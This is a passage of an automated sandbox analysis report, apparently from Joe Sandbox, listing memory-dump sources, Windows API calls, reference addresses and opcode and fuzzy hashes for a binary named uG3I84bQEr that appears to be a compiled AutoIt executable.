                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 23aa5d6730224e7b4161d594b5eb1c95187ee6def08ffadbe1a1e65e6f887bd2
                                                            • Instruction ID: 95ef85ecf4a985c53e38b6b1237abcb75d3ed32973377874be14757091495c4e
                                                            • Opcode Fuzzy Hash: 23aa5d6730224e7b4161d594b5eb1c95187ee6def08ffadbe1a1e65e6f887bd2
                                                            • Instruction Fuzzy Hash: 2B112C756046029FC724DF29D541916B7E9EF49314B20882EE48ACB362DB36E841CB55
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
                                                            • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                            • Opcode Fuzzy Hash: 09e41418d1e9b6219f99264fae2f86dd6bd4a9879c6b4cfad7685436d9da2e65
                                                            • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,004056A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00405C16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                            • Instruction ID: 772d3f2de97e4a3295a634e8ff1b07ab9ba467494f4d4c1bb2e9b048b5294e56
                                                            • Opcode Fuzzy Hash: 004768512cec5bb2a12ad018666046467aa459102812d405fbf65d0c4fac9fff
                                                            • Instruction Fuzzy Hash: C5112831204B049FE3208F19C880B67B7F8EB44764F10C92EE9AA96A91D774F845CF64
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 5a02a00512f46877ea8946ec1b9fc00a7595a857a6becba086734166165304c3
                                                            • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                                                            • Opcode Fuzzy Hash: 5a02a00512f46877ea8946ec1b9fc00a7595a857a6becba086734166165304c3
                                                            • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: df774b81d38fe665cf5983e2870c673d55002798de476a7d083b4bdff743f218
                                                            • Instruction ID: c8aa675d6e6404deb7208196b3c7c9b180f52614a9741afe76955938a5085f89
                                                            • Opcode Fuzzy Hash: df774b81d38fe665cf5983e2870c673d55002798de476a7d083b4bdff743f218
                                                            • Instruction Fuzzy Hash: 1601846180D7409EC7358B2484547357BF4EB56313F4D96DAAD85AB1E2D6708D0CC752
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 004248A6
                                                              • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                            • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                            • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                            • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                            • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                            • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                            • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                            APIs
                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                            • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                            • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                            • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                            • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                            • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                            • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                                                            • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                            • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00441DF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: PathTemp
                                                            • String ID:
                                                            • API String ID: 2920410445-0
                                                            • Opcode ID: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
                                                            • Instruction ID: cdab6d828b25e7ec8576945e7c24180a122b150f18df0bf6d50e7f80ea2f144b
                                                            • Opcode Fuzzy Hash: c0665e8fbe40942abc26bfd634a772ce9cb0981408ba10bcaabf6bd0c700ab3d
                                                            • Instruction Fuzzy Hash: C7C04C715500199BD715A754DC95AA8767CAB10705F4040EAB105D105196745B85CF29
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 1f482e499efe4cdbac250247dc780417b0912bf5c3f395d7cd633a9b58f30c2c
                                                            • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                                                            • Opcode Fuzzy Hash: 1f482e499efe4cdbac250247dc780417b0912bf5c3f395d7cd633a9b58f30c2c
                                                            • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction ID: 3083c8a970440cea7feb801ee9245a850a440729a8bd6e9a82d9429536132d00
                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction Fuzzy Hash: 5BE09A7494110DEFDB00DFA8DA4969D7BB4EF04301F1006A1FD0596680DA309A549A62
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247837317.0000000000DD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD6000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dd6000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 7dfc37142d194d72c2589021be5c8937a300384febc83de587286e6edc20f2e9
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 2AE0E67494110DDFDB00DFB8DA4D69D7BF4EF04301F100261FD01D2280DA309D509A72
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                            • SendMessageW.USER32 ref: 0048CC29
                                                            • _wcsncpy.LIBCMT ref: 0048CC95
                                                            • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                            • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                            • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                            • SendMessageW.USER32 ref: 0048CD33
                                                            • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                            • SetCapture.USER32(?), ref: 0048CE69
                                                            • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                            • ReleaseCapture.USER32 ref: 0048CF00
                                                            • GetCursorPos.USER32(?), ref: 0048CF3A
                                                            • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                            • SendMessageW.USER32 ref: 0048CFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                            • SendMessageW.USER32 ref: 0048D03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                            • GetCursorPos.USER32(?), ref: 0048D08D
                                                            • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                            • GetParent.USER32(?), ref: 0048D0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                            • SendMessageW.USER32 ref: 0048D154
                                                            • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                            • SendMessageW.USER32 ref: 0048D22F
                                                            • ClientToScreen.USER32(?,?), ref: 0048D281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                              • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pD
                                                            • API String ID: 3977979337-2162445630
                                                            • Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                            • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                            • Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                            • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                            • API String ID: 1357608183-1426331590
                                                            • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                            • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                            • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                            • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
